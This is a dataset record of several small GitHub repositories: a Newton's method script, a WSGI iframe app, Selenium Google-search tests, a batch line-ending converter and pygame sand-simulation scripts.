2021-09-07T23:29:56
404,149,810
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5218855142593384, "alphanum_fraction": 0.5412458181381226, "avg_line_length": 18.393442153930664, "blob_id": "19293bd2a7deaabd65409900dc3a5c2ec7159123", "content_id": "be30b54a297e5221a3ec5b7b15cd00363a3dbfac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 78, "num_lines": 61, "path": "/newtons_method.py", "repo_name": "kiradegraw/testRemoteRepo", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\n\nimport sys\n\nfrom typing import (Callable)\nimport typing\nfrom fractions import (Fraction)\n\n\nEPSILON = 10e-6\nMAX_ITERATIONS = 100\n\ndef newtons_method(f, df, x_n, eps=EPSILON):\n\n n = 0\n\n next_x_n = x_n + 1000 * eps\n while abs(x_n - next_x_n) > eps:\n x_n = next_x_n\n next_x_n = x_n - (f(x_n) / df(x_n))\n\n if n >= MAX_ITERATIONS:\n break\n\n n += 1\n\n return x_n\n\n\ndef main():\n try:\n initial_guess = float(sys.argv[1])\n\n except IndexError as error:\n print(\"Usage: {0} initial_guess\".format(*sys.argv))\n sys.exit(1)\n\n except ValueError as error:\n print(\"ERROR {0} is not a valid number\".format(*sys.argv))\n print(\" \" + str(error))\n sys.exit(2)\n\n # Function (f) and its derivative (dx)\n def f(x):\n return (x ** 2) - 1\n\n def df(x):\n return 2 * x\n\n try:\n solution_newton = newtons_method(f, df, initial_guess)\n fx_newton = f(solution_newton)\n\n print(\"x = {:.4f} | f(x) = {:.4f}\".format(solution_newton, fx_newton))\n\n except ZeroDivisionError as error:\n print(str(error))\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n" } ]
1
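The script above implements the standard Newton iteration x_{n+1} = x_n - f(x_n)/f'(x_n). As a quick sanity check of the algorithm (this snippet is a sketch, not part of the repo), here are the first iterates for its built-in f(x) = x^2 - 1 starting from 2.0:

```python
def f(x):
    return x ** 2 - 1

def df(x):
    return 2 * x

x = 2.0
for n in range(4):
    # One Newton step: x <- x - f(x)/f'(x)
    x = x - f(x) / df(x)
    print(n + 1, x)
# Prints roughly 1.25, 1.025, 1.0003, 1.00000005 -- the quadratic
# convergence toward the root x = 1 that the stopping test relies on.
```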
CaViJun/pregnancy
https://github.com/CaViJun/pregnancy
051b45973528edcc9275114152d61244333f647d
72a872093c585cb0495a583d31638d4b0a068dcf
6202827680c46e2f7561b2cebb8b414b6433b541
refs/heads/master
2020-05-16T23:41:24.728922
2015-04-15T04:57:05
2015-04-15T04:57:05
28,946,347
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7903929948806763, "alphanum_fraction": 0.7903929948806763, "avg_line_length": 75, "blob_id": "e6581b50f6babf5ac9fae737dd8da528280d0128", "content_id": "9b726f1c3f61c1f3ac32c3a51315a527d9d4d781", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 229, "license_type": "no_license", "max_line_length": 137, "num_lines": 3, "path": "/README.md", "repo_name": "CaViJun/pregnancy", "src_encoding": "UTF-8", "text": "# pregnancy\nA little web app to show the pregnancy procedure. Set the date pregnant,then it compute the birthday,also show how many days,weeks passed\nand left. In fact it appears in two ways:Python web app, Python command line. \n" }, { "alpha_fraction": 0.5689922571182251, "alphanum_fraction": 0.5937984585762024, "avg_line_length": 22.88888931274414, "blob_id": "a098c5085548e76e7954fd05fe6a0a353fa4931d", "content_id": "6b1415da564839f63be851183e2cad6f21009d22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 645, "license_type": "no_license", "max_line_length": 148, "num_lines": 27, "path": "/wsgi.py", "repo_name": "CaViJun/pregnancy", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom bottle import static_file\n\ndef application(environ,start_response):\n if environ['PATH_INFO'] == '/favicon.ico':\n return static_file('favicon.ico',root='./')\n \n data = '''\n<head>\n<style>\nbody{\nmargin: 0px;\n}\n</style>\n</head>\n<body>\n<iframe border=\"0\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" width=\"100%\" height=\"100%\" src=\"http://man.jcloud.com/appengine/jae/hello.html\">\n</iframe>\n</body>\n</html>\n'''\n start_response(\"200 OK\",[\n (\"Content-Type\",\"text/html;charset=utf-8\"),\n (\"Content-Length\",str(len(data)))\n ])\n return iter([data])\n#improvement\n" } ]
2
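The `wsgi.py` above is a bare WSGI callable: it receives the request `environ` dict, reports status and headers through `start_response`, and returns an iterable of body chunks. A minimal sketch of serving such a callable locally with the standard library's `wsgiref` server (note that under Python 3 the body chunks must be `bytes`, while this repo targets Python 2 where `str` suffices):

```python
from wsgiref.simple_server import make_server

def application(environ, start_response):
    body = b"hello from WSGI"  # Python 3: response bodies must be bytes
    start_response("200 OK", [
        ("Content-Type", "text/plain; charset=utf-8"),
        ("Content-Length", str(len(body))),
    ])
    return [body]  # any iterable of byte strings works

if __name__ == "__main__":
    # Serve on http://localhost:8000/ until interrupted.
    make_server("", 8000, application).serve_forever()
```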
akshatha206/selenium
https://github.com/akshatha206/selenium
d51eb585f4b0b15f60b970c505c1d1413b7cdda1
bdc58fac984bda5587eaf987f18547ec5bc62abd
3758a465fe74308fdff77be545573b2e434bc69c
refs/heads/main
2023-04-21T07:33:43.777647
2021-05-16T15:43:16
2021-05-16T15:43:16
367,869,419
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7281947135925293, "alphanum_fraction": 0.7281947135925293, "avg_line_length": 23.649999618530273, "blob_id": "e04cd97aa8634c4bfd29c9c6c1b3d35f874fbc13", "content_id": "d9f58a15c3e056cd215491b8fcbb21f93fc4d0f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 986, "license_type": "no_license", "max_line_length": 58, "num_lines": 40, "path": "/selenium.py", "repo_name": "akshatha206/selenium", "src_encoding": "UTF-8", "text": "import selenium\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n# inherit TestCase Class and create a new test class\nclass PythonOrgSearch(unittest.TestCase):\n\n\t# initialization of webdriver\n\tdef setUp(self):\n\t\tself.driver = webdriver.Firefox()\n\n\t# Test case method. It should always start with test_\n\tdef test_search_in_python_org(self):\n\t\t\n\t\t# get driver\n\t\tdriver = self.driver\n\t\t# get python.org using selenium\n\t\tdriver.get(\"https://www.google.com/\")\n\n\t\t# assertion to confirm if title has python keyword in it\n\t\tself.assertIn(\"google\", driver.title)\n\n\t\t# locate element using name\n\t\telem = driver.find_element_by_name(\"q\")\n\n\t\t# send data\n\t\telem.send_keys(\"hello world\")\n\n\t\t# recieve data\n\t\telem.send_keys(Keys.RETURN)\n\t\tassert \"No results found.\" not in driver.page_source\n\n\t# cleanup method called after every test performed\n\tdef tearDown(self):\n\t\tself.driver.close()\n\n# execute the script\nif __name__ == \"__main__\":\n\tunittest.main()\n" }, { "alpha_fraction": 0.6643564105033875, "alphanum_fraction": 0.6683168411254883, "avg_line_length": 41.04166793823242, "blob_id": "8dc3d445059e4751b888ebc6b1bace5fb9e24e33", "content_id": "d1f98057a44a38ebafcb694fba13ff238e9429cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 118, "num_lines": 24, "path": "/googlesearch.py", "repo_name": "akshatha206/selenium", "src_encoding": "UTF-8", "text": "import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nclass GoogleSearch(unittest.TestCase):\n @classmethod\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r'C:\\Users\\user\\Downloads\\chromedriver_win32\\chromedriver.exe')\n self.driver.implicitly_wait(10)\n self.driver.maximize_window()\n def test_search_google(self):\n self.driver.get(\"http://google.com\")\n self.driver.find_element_by_name(\"q\").send_keys(\"Automation step by step\")\n self.driver.find_element_by_name(\"btnK\").click()\n def test_search_me(self):\n self.driver.get(\"http://google.com\")\n self.driver.find_element_by_name(\"q\").send_keys(\"Akshatha Shivanna instagram\")\n self.driver.find_element_by_name(\"btnK\").click()\n @classmethod\n def tearDown(self):\n self.driver.close()\n self.driver.quit()\n print(\"test completed\")\nif __name__ == \"__main__\":\n\tunittest.main(argv=['first-arg-is-ignored'], exit=False) \n" } ]
2
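Both test files above rely on `implicitly_wait` (or no waiting at all) before locating elements. A sketch of the same lookup using Selenium's explicit-wait API instead, which blocks only where a wait is actually needed (the timeout value and locator here are arbitrary):

```python
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.Chrome()
driver.get("https://www.google.com/")
# Block for up to 10 seconds until the search box is present,
# instead of applying an implicit wait to every lookup.
box = WebDriverWait(driver, 10).until(
    EC.presence_of_element_located((By.NAME, "q")))
box.send_keys("Automation step by step", Keys.RETURN)
driver.quit()
```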
Kevin163/python_samples
https://github.com/Kevin163/python_samples
410975efb28ee59e973c71b6aeeffb3340f5176f
555c9b72c501ceca72054d1e272219c9f769243a
0560da2b7f2b7cdaa8a4414e17da56ebdd9583ac
refs/heads/master
2021-05-08T09:23:00.231286
2017-10-16T11:42:13
2017-10-16T11:42:13
107,119,404
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.585300087928772, "alphanum_fraction": 0.6109238266944885, "avg_line_length": 19.83823585510254, "blob_id": "c0831d5e4393f86c8fd0848704a405d74cc58dbc", "content_id": "fb93f41790ba76924744d120b07c7070bab1051d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "permissive", "max_line_length": 48, "num_lines": 68, "path": "/batchChangeFileLine.py", "repo_name": "Kevin163/python_samples", "src_encoding": "UTF-8", "text": "# batchChangeFileLine.py\r\n# Created:2017-10-13 17:28:40\r\n\r\n'''\r\n批量修改指定目录文件的换行符\r\n调用示例:\r\n将d:\\temp目录下的所有文件的换行符由\\n替换为\\r\\n\r\npy batchChangeFileLine d:\\temp\r\n将d:\\temp目录下的所有文件的换行符由\\r\\n替换为\\n\r\npy batchChangeFileLine d:\\temp 1\r\n'''\r\n\r\n__author__ = \"Kevin\"\r\n__version__ = \"1.0\"\r\n\r\nimport os\r\nimport sys\r\n\r\ndef batchChangeFileLine(workDir,win2unix=False):\r\n\tfiles = os.listdir(workDir)\r\n\toldStr = b\"\\r\"\r\n\tnewStr = b\"\"\r\n\tif not win2unix:\r\n\t\toldStr = b\"\\n\"\r\n\t\tnewStr = b\"\\r\\n\"\r\n\tdata = b''\r\n\tfor f in files:\t\t\r\n\t\tfold = os.path.join(workDir,f)\r\n\t\tfnew = os.path.join(workDir,\"$\"+f)\r\n\t\tif os.path.isfile(fold):\r\n\t\t\ttry:\r\n\t\t\t\tprint(\"开始处理文件:{0}\".format(fold))\r\n\t\t\t\twith open(fold,'rb+') as fr:\r\n\t\t\t\t\twith open(fnew,'ba+') as fw:\r\n\t\t\t\t\t\twhile(True):\r\n\t\t\t\t\t\t\tdata = fr.read(200)\r\n\t\t\t\t\t\t\tnewData = data.replace(oldStr,newStr)\r\n\t\t\t\t\t\t\tfw.write(newData)\r\n\t\t\t\t\t\t\tif len(data) < 200:\r\n\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\tos.remove(fold)\r\n\t\t\t\tos.rename(fnew,fold)\r\n\t\t\t\tprint(\"结束处理文件:{0}\".format(fold))\r\n\t\t\texcept IOError as e:\r\n\t\t\t\tprint(\"处理文件{0}失败,原因:{1}\".format(fold,e))\r\n\r\ndef main():\r\n\tworkDir = \"\"\r\n\twin2unix = False\r\n\targLen = len(sys.argv)\r\n\tif(argLen > 1):\r\n\t\tworkDir = sys.argv[1]\r\n\tif(argLen > 2):\r\n\t\twin2unix = int(sys.argv[2]) == 1\r\n\tif(workDir != \"\"): \r\n\t\tbatchChangeFileLine(workDir,win2unix)\r\n\telse:\r\n\t\tprint(r'''\r\n批量修改指定目录文件的换行符\r\n调用示例:\r\n将d:\\temp目录下的所有文件的换行符由\\n替换为\\r\\n\r\npy batchChangeFileLine d:\\temp\r\n将d:\\temp目录下的所有文件的换行符由\\r\\n替换为\\n\r\npy batchChangeFileLine d:\\temp 1\r\n''')\r\n\r\nif __name__ == '__main__':\r\n\tmain()" }, { "alpha_fraction": 0.8780487775802612, "alphanum_fraction": 0.8780487775802612, "avg_line_length": 19.5, "blob_id": "c6fe8477e71a4e4e82ea7d91c31bbdc6a19cc389", "content_id": "97ff5377eb76cbc9686b6a97b80c2d54a606cbc1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "permissive", "max_line_length": 23, "num_lines": 2, "path": "/README.md", "repo_name": "Kevin163/python_samples", "src_encoding": "UTF-8", "text": "# python_samples\n学习python过程中的示例代码和常用工具代码\n" } ]
2
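One caveat with the chunked replace in `batchChangeFileLine.py` above: in the Unix-to-Windows direction it rewrites every `\n`, so a file that already contains `\r\n` pairs comes out as `\r\r\n`. A sketch of a normalize-first variant that avoids this (it reads the whole file, so it is only suitable for files that fit in memory; the function name is invented here):

```python
def convert_line_endings(path, win2unix=False):
    with open(path, "rb") as fh:
        data = fh.read()
    # Normalize everything to \n first, so existing \r\n pairs are
    # not doubled into \r\r\n on the way to Windows endings.
    data = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    if not win2unix:
        data = data.replace(b"\n", b"\r\n")
    with open(path, "wb") as fh:
        fh.write(data)
```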
JoshuaBragg/SandSimulator
https://github.com/JoshuaBragg/SandSimulator
3dfbe83efd5ed51de31a7d4c1622a3f37d0aa5e7
fad13e5c8124d46c5d985487286375ce0f212d52
6191d4c3836ef85a11cc7f7139c52bef99dba4c1
refs/heads/master
2021-06-30T03:45:32.807576
2017-09-18T17:35:47
2017-09-18T17:35:47
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5403437614440918, "alphanum_fraction": 0.6014155745506287, "avg_line_length": 70.69117736816406, "blob_id": "7ed9b39f8ff9eebfe32ed30efdd8b2e80c740b2a", "content_id": "700f432f05ef2f7b276f2dd3c802e60439a59f05", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4945, "license_type": "permissive", "max_line_length": 353, "num_lines": 68, "path": "/SandFullSolidCLComp.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame, random, math\r\nscreen = pygame.display.set_mode((0,0), pygame.FULLSCREEN); pygame.display.set_caption(\"Sand\"); pygame.font.init(); pygame.init();sandl = [];barl = [];clock = pygame.time.Clock();board = [[0]*math.ceil(screen.get_width()/5) for i in range(math.ceil(screen.get_height()/5))];board[math.ceil(screen.get_height()/5)-1] = [1]*math.ceil(screen.get_width()/5)\r\nfor i in range(0,math.ceil(screen.get_height()/5)-1):\r\n\tboard[i][0] = 1;board[i][math.ceil(screen.get_width()/5)-1] = 1\r\nbn = board[:];r = random.randint(10,245);g = random.randint(10,245);b = random.randint(10,245);r1 = 1;g1 = 0;b1 = 1;rg1 = 0;gg1 = 1;bg1 = 0;rg = 250;gg = 250;bc = 250\r\nwhile (True):\r\n\tclock.tick(60);screen.fill((255,255,255))\r\n\tif (pygame.mouse.get_pressed()[0]):\r\n\t\tif (r > 253):r1 = 0\t\r\n\t\tif (r < 2):r1 = 1\r\n\t\tif (r1 == 1):r = r + .15\t\t\t\r\n\t\tif (r1 == 0):r = r - .15\r\n\t\tif (g > 253):g1 = 0\t\t\r\n\t\tif (g < 2):g1 = 1\t\t\r\n\t\tif (g1 == 1):g = g + .1\t\t\r\n\t\tif (g1 == 0):g = g - .1\t\r\n\t\tif (b > 253):b1 = 0\t\t\r\n\t\tif (b < 2):b1 = 1\r\n\t\tif (b1 == 1):b = b + .05\t\t\t\r\n\t\tif (b1 == 0):b = b - .05\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.colour = (r,g,b);self.velox = 0;self.x = xm;self.y = ym;self.yf = int(self.y)\r\n\t\t\twhile (abs(self.velox) < .5):self.velox = random.randint(-48,48)/80\r\n\t\tdef ID(self,ID):self.ID = ID\r\n\t\tdef Fall(self):\r\n\t\t\tself.x += self.velox\r\n\t\t\tif self.velox > 0:self.velox -= .01\r\n\t\t\tif self.velox < 0 :self.velox += .01\r\n\t\t\tif abs(self.velox) < 0.2:self.velox = 0\r\n\t\t\tself.x = int(round(self.x,0))\r\n\t\t\tif self.yf < (math.ceil(screen.get_height()/5)-1) and 0 < self.x < (math.ceil(screen.get_width()/5)-1):board[self.yf][self.x] = 1\r\n\t\t\tif board[self.yf+1][self.x] != 1:board[self.yf][self.x] = 0;self.y += 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0;self.d = random.randint(0,1)\r\n\t\t\t\tif self.d == 0:self.x += 1\r\n\t\t\t\telse:self.x -= 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] == 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:board[self.yf][self.x] = 0;self.x += 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] != 1:board[self.yf][self.x] = 0;self.x -= 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] != 1 and board[self.yf+1][self.x-1] == 1 and board[self.yf][self.x+1] != 1 and board[self.yf][self.x-1] == 1:board[self.yf][self.x] = 0;self.x += 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] != 1 and board[self.yf][self.x+1] == 1 and 
board[self.yf][self.x-1] != 1:board[self.yf][self.x] = 0;self.x -= 1\r\n\t\t\tif board[self.yf+1][self.x] == 1 and board[self.yf+1][self.x+1] == 1 and board[self.yf+1][self.x-1] == 1:del sandl[sandl.index(self.ID)]\r\n\t\t\tself.yf = int(round(self.y,0));pygame.draw.rect(screen, self.colour, (self.x*5,self.yf*5,5,5),0)\r\n\tclass Barrier():\r\n\t\tdef __init__(self):\r\n\t\t\tself.x = int(xm);self.y = int(ym)\r\n\t\t\ttry:board[self.y][self.x] = 1;board[self.y+1][self.x+1] = 1;board[self.y+1][self.x] = 1;board[self.y+1][self.x-1] = 1;board[self.y][self.x+1] = 1;board[self.y][self.x-1] = 1;board[self.y-1][self.x+1] = 1;board[self.y-1][self.x] = 1;board[self.y-1][self.x-1] = 1\t\r\n\t\t\texcept IndexError:pass\r\n\t\tdef ShowBarrier(self):pygame.draw.rect(screen, (r,g,b), (self.x*5-5,self.y*5-5,15,15),0)\r\n\txa, ya = pygame.mouse.get_pos();xp = xa%5;xm = (xa-xp)/5;yp = ya%5;ym = (ya-yp)/5\r\n\tif pygame.mouse.get_pressed()[2]:bar = Barrier();barl.append(bar)\r\n\tif pygame.mouse.get_pressed()[0]:sand = Sand();sandl.append(sand);sand.ID(sand);sand = Sand();sandl.append(sand);sand.ID(sand)\r\n\tfor i in range(0,len(sandl)):\r\n\t\ttry:sandl[i].Fall()\r\n\t\texcept IndexError:pass\r\n\tfor i in range(0,math.ceil(screen.get_height()/5)):\r\n\t\tfor c in range(0,math.ceil(screen.get_width()/5)):\r\n\t\t\tif bn[i][c] == 1:pygame.draw.rect(screen, (r,g,b), (c*5,i*5,5,5),0)\r\n\tfor i in range(0,len(barl)):\r\n\t\ttry:barl[i].ShowBarrier()\r\n\t\texcept IndexError:pass\r\n\tpygame.draw.rect(screen, (r,g,b), (0,screen.get_height()-5,screen.get_width(),5),0);pygame.draw.rect(screen, (r,g,b), (0,0,5,screen.get_width()),0);pygame.draw.rect(screen, (r,g,b), (screen.get_width()-5,0,5,screen.get_height()),0)\r\n\tpygame.display.flip();event = pygame.event.poll()\r\n\tif pygame.key.get_pressed()[pygame.K_DELETE]:\r\n\t\tboard = [[0]*math.ceil(screen.get_width()/5) for i in range(math.ceil(screen.get_height()/5))];board[math.ceil(screen.get_height()/5)-1] = [1]*math.ceil(screen.get_width()/5)\r\n\t\tfor i in range(0,math.ceil(screen.get_height()/5)-1):board[i][0] = 1;board[i][math.ceil(screen.get_width()/5)-1] = 1\r\n\t\tsandl = [];barl = [];bn = board[:]\r\n\tif pygame.key.get_pressed()[pygame.K_ESCAPE]:break\r\n\r\n" }, { "alpha_fraction": 0.521774172782898, "alphanum_fraction": 0.5895161032676697, "avg_line_length": 18.66666603088379, "blob_id": "9472b738b0669a6763af600a38ea36d6f2ff2d6b", "content_id": "60c5cd6a00091957740ae0ec3e1d60eb10bf33b0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1240, "license_type": "permissive", "max_line_length": 51, "num_lines": 60, "path": "/Sandt.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame, random\r\nscreen = pygame.display.set_mode((1000,750))\r\npygame.display.set_caption(\"Sand\")\r\npygame.font.init()\r\npygame.init()\r\n\r\n#Colours\r\nif (True):\r\n\tblack = (0,0,0)\r\n\twhite = (255,255,255)\r\n\tred = (255,0,0)\r\n\tgreen = (0,255,0)\r\n\tdark_green = (30,140,47)\r\n\tblue = (0,0,255)\r\n\tbrown = (83,67,27)\r\n\tyellow = (255,255,0)\r\n\tgray = (150, 150, 150)\r\n\r\nsandl = []\r\nclock = pygame.time.Clock()\r\n\r\nwhile (True):\r\n\tclock.tick(120)\r\n\tscreen.fill(white)\r\n\t\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.image = pygame.image.load(\"pexplosion.jpg\")\r\n\t\t\tself.rect = self.image.get_rect()\r\n\t\t\tself.velox = 0\r\n\t\t\twhile (self.velox == 0):\r\n\t\t\t\tself.velox = 
random.randint(-10,10)/10\r\n\t\t\tself.veloy = 0\r\n\t\t\twhile (self.veloy == 0):\r\n\t\t\t\tself.veloy = random.randint(-10,10)/10\r\n\t\t\tself.x = xa\r\n\t\t\tself.y = ya\r\n\t\t\r\n\t\tdef Fall(self):\r\n\t\t\tself.rect.topleft = (self.x,self.y)\r\n\t\t\tself.x += self.velox\r\n\t\t\tself.y += self.veloy\r\n\t\t\tscreen.blit(self.image, self.rect)\r\n\t\t\t\r\n\t\r\n\txa, ya = pygame.mouse.get_pos()\r\n\t\r\n\tif pygame.mouse.get_pressed()[0]:\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\t\r\n\tfor i in range(0,len(sandl)):\r\n\t\tsandl[i].Fall()\r\n\t\r\n\t\r\n\t\r\n\tpygame.display.flip()\r\n\tevent = pygame.event.poll()\r\n\tif (event.type == pygame.QUIT):\r\n\t\tbreak\r\n" }, { "alpha_fraction": 0.8070175647735596, "alphanum_fraction": 0.8070175647735596, "avg_line_length": 19.727272033691406, "blob_id": "29153001775e2071d12abaaa994d0ecef8c561b8", "content_id": "503c21ea80adce6264e289fffeb6aa14a138c126", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 228, "license_type": "permissive", "max_line_length": 120, "num_lines": 11, "path": "/README.md", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "# SandSimulator\n\nSand Simulation made in Python\n\nUse SandFullScreen.py for newest version or SandBarrier.py for older/slower/not fullscreen but still functioning version\n\nControls:\n\n\tLeft-Click: sand\n\n\tRight-Click: draw barrier\n" }, { "alpha_fraction": 0.5239999890327454, "alphanum_fraction": 0.5784000158309937, "avg_line_length": 17.841270446777344, "blob_id": "ade9928f9c9fbe05b1c10d524f8a17499bf723b8", "content_id": "b49714a862187bf81521ec60ba57832230b66a51", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1250, "license_type": "permissive", "max_line_length": 82, "num_lines": 63, "path": "/Sanddraw.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame\r\nscreen = pygame.display.set_mode((1000,750))\r\npygame.display.set_caption(\"Sand\")\r\npygame.font.init()\r\npygame.init()\r\n\r\n#Colours\r\nif (True):\r\n\tblack = (0,0,0)\r\n\twhite = (255,255,255)\r\n\tred = (255,0,0)\r\n\tgreen = (0,255,0)\r\n\tdark_green = (30,140,47)\r\n\tblue = (0,0,255)\r\n\tbrown = (83,67,27)\r\n\tyellow = (255,255,0)\r\n\tgray = (150, 150, 150)\r\n\r\nsandl = []\r\nsandloc = []\r\n\r\nwhile (True):\r\n\tscreen.fill(white)\r\n\t\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.image = pygame.image.load(\"pexplosion.jpg\")\r\n\t\t\tself.x = xa\r\n\t\t\tself.y = ya\r\n\t\t\t\r\n\t\tdef ID(self):\r\n\t\t\tself.loc = sandl.index(sand)\r\n\t\t\r\n\t\tdef Fall(self):\r\n\t\t\tscreen.blit(self.image, (self.x,self.y))\r\n\t\t\ttry:\r\n\t\t\t\tsandloc[self.loc] = (self.x,self.y)\r\n\t\t\texcept IndexError:\r\n\t\t\t\tsandloc.append(\"\")\r\n\t\t\t\tsandloc[self.loc] = (self.x,self.y)\r\n\t\t\tif self.loc != 0:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tpygame.draw.line(screen, black, (sandloc[self.loc]),(sandloc[self.loc-1]), 6)\r\n\t\t\t\texcept IndexError:\r\n\t\t\t\t\tpass\r\n\t\t\t\r\n\t\r\n\txa, ya = pygame.mouse.get_pos()\r\n\t\r\n\tif pygame.mouse.get_pressed()[0]:\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\tsand.ID()\r\n\t\t\r\n\tfor i in range(0,len(sandl)):\r\n\t\tsandl[i].Fall()\r\n\t\r\n\t\r\n\t\r\n\tpygame.display.flip()\r\n\tevent = pygame.event.poll()\r\n\tif (event.type == pygame.QUIT):\r\n\t\tbreak\r\n" }, { "alpha_fraction": 0.4779771566390991, "alphanum_fraction": 
0.5481239557266235, "avg_line_length": 17.9891300201416, "blob_id": "7236b11c5d8aa72f5d44e470003a13af9f4787fb", "content_id": "30f9d3c6344e629afc80a7839ef2f918825e1331", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1839, "license_type": "permissive", "max_line_length": 68, "num_lines": 92, "path": "/SandChrissucks.py", "repo_name": "JoshuaBragg/SandSimulator", "src_encoding": "UTF-8", "text": "import pygame, random, os\r\nscreen = pygame.display.set_mode((150,100))\r\npygame.display.set_caption(\"Sand\")\r\npygame.font.init()\r\npygame.init()\r\n\r\n#Colours\r\nif (True):\r\n\tblack = (0,0,0)\r\n\twhite = (255,255,255)\r\n\tred = (255,0,0)\r\n\tgreen = (0,255,0)\r\n\tdark_green = (30,140,47)\r\n\tblue = (0,0,255)\r\n\tbrown = (83,67,27)\r\n\tyellow = (255,255,0)\r\n\tgray = (150, 150, 150)\r\n\r\nsandl = []\r\nsandr = []\r\nclock = pygame.time.Clock()\r\nboard = [[0]*30 for i in range(20)]\r\nboard[19] = [1]*29\r\nfor i in range(0,19):\r\n\tboard[i][0] = 1\r\n\tboard[i][29] = 1\r\nr = 0\r\ng = 0\r\nb = 0\r\n\r\nwhile (True):\r\n\tclock.tick(10)\r\n\tscreen.fill(white)\r\n\tos.system('cls')\r\n\tfor i in range(0,20):\r\n\t\tprint (board[i])\r\n\t\r\n\tclass Sand():\r\n\t\tdef __init__(self):\r\n\t\t\tself.colour = (r,g,b)\r\n\t\t\tself.velox = 0\r\n\t\t\twhile (abs(self.velox) < .5):\r\n\t\t\t\tself.velox = random.randint(-24,24)/40\r\n\t\t\tself.x = xm\r\n\t\t\tself.y = ym\r\n\t\t\tself.yf = int(self.y)\r\n\t\t\r\n\t\tdef ID(self):\r\n\t\t\tself.loc = sandl.index(sand)\r\n\t\t\r\n\t\tdef Fall(self):\r\n\t\t\tself.x += self.velox\r\n\t\t\tif self.velox > 0:\r\n\t\t\t\tself.velox -= .01\r\n\t\t\tif self.velox < 0 :\r\n\t\t\t\tself.velox += .01\r\n\t\t\tif abs(self.velox) < 0.2:\r\n\t\t\t\tself.velox = 0\r\n\t\t\tself.x = int(round(self.x,0))\r\n\t\t\tif self.yf < 19 and 0 < self.x < 29:\r\n\t\t\t\tboard[self.yf][self.x] = 1\r\n\t\t\tif board[self.yf+1][self.x] != 1:\r\n\t\t\t\tboard[self.yf][self.x] = 0\r\n\t\t\t\tself.y += .8\r\n\t\t\tself.yf = int(round(self.y,0))\r\n\t\t\t\r\n\t\t\tpygame.draw.rect(screen, self.colour, (self.x*5,self.yf*5,5,5),0)\r\n\t\t\t\r\n\t\r\n\txa, ya = pygame.mouse.get_pos()\r\n\t\r\n\txp = xa%5\r\n\txm = (xa-xp)/5\r\n\typ = ya%5\r\n\tym = (ya-yp)/5\r\n\t\r\n\tprint (xm,ym)\r\n\t\r\n\tif pygame.mouse.get_pressed()[0]:\r\n\t\tsand = Sand()\r\n\t\tsandl.append(sand)\r\n\t\tsand.ID()\r\n\t\t\r\n\tsandr2 = sandr\r\n\t\t\r\n\tfor i in range(0,len(sandl)):\r\n\t\tsandl[i].Fall()\t\t\t\t\r\n\t\r\n\tpygame.display.flip()\r\n\tevent = pygame.event.poll()\r\n\tif (event.type == pygame.QUIT):\r\n\t\tbreak\r\n" }, { "alpha_fraction": 0.453562468290329, 